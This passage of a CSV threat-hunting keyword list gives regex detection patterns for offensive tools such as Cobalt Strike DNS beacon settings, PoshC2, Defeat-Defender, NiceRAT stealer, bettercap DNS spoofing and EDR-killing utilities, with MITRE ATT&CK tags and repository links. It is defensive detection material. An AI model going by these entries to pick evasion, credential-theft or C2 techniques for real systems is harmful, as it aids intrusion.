Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection.sln*",".{0,1000}DllNotificationInjection\.sln.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection.vcxproj*",".{0,1000}DllNotificationInjection\.vcxproj.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection-master*",".{0,1000}DllNotificationInjection\-master.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*dllproxy.py*",".{0,1000}dllproxy\.py.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation 
Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*DllProxy-main*",".{0,1000}DllProxy\-main.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*dllsearcher *.dll*",".{0,1000}dllsearcher\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*-dll-sideload=*.dll*",".{0,1000}\-dll\-sideload\=.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*DLL-Spoofer-main*",".{0,1000}DLL\-Spoofer\-main.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" 
"*dmcxblue/SharpBlackout*",".{0,1000}dmcxblue\/SharpBlackout.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*",".{0,1000}dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*dmg2john.py*",".{0,1000}dmg2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*dnefedniw eteled cs*",".{0,1000}dnefedniw\s\seteled\scs.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*DNet-EnumerateAllDomainUserAccounts*",".{0,1000}DNet\-EnumerateAllDomainUserAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" 
"*DNet-ListAccountsByDescription*",".{0,1000}DNet\-ListAccountsByDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListDomainUserAccountsWithCompletedADDescription*",".{0,1000}DNet\-ListDomainUserAccountsWithCompletedADDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListUsersInDomainAdminsGroup*",".{0,1000}DNet\-ListUsersInDomainAdminsGroup.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*dnf install tor -y*",".{0,1000}dnf\sinstall\stor\s\-y.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dngmlblcodfobpdpecaadgfbcggfjfnm*",".{0,1000}dngmlblcodfobpdpecaadgfbcggfjfnm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*dns.lexfo.fr*",".{0,1000}dns\.lexfo\.fr.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*dns.spoof on*",".{0,1000}dns\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.address*",".{0,1000}dns\.spoof\.address.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.all*",".{0,1000}dns\.spoof\.all.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.domains*",".{0,1000}dns\.spoof\.domains.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.hosts*",".{0,1000}dns\.spoof\.hosts.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns_beacon_beacon*",".{0,1000}dns_beacon_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_idle*",".{0,1000}dns_beacon_dns_idle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_sleep*",".{0,1000}dns_beacon_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_stager_prepend*",".{0,1000}dns_beacon_dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_stager_subhost*",".{0,1000}dns_beacon_dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_ttl*",".{0,1000}dns_beacon_dns_ttl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_get_A*",".{0,1000}dns_beacon_get_A.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_get_TXT*",".{0,1000}dns_beacon_get_TXT.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" 
"*dns_beacon_maxdns*",".{0,1000}dns_beacon_maxdns.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_ns_response*",".{0,1000}dns_beacon_ns_response.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_put_metadata*",".{0,1000}dns_beacon_put_metadata.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_put_output*",".{0,1000}dns_beacon_put_output.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_bruteforce.rb*",".{0,1000}dns_bruteforce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
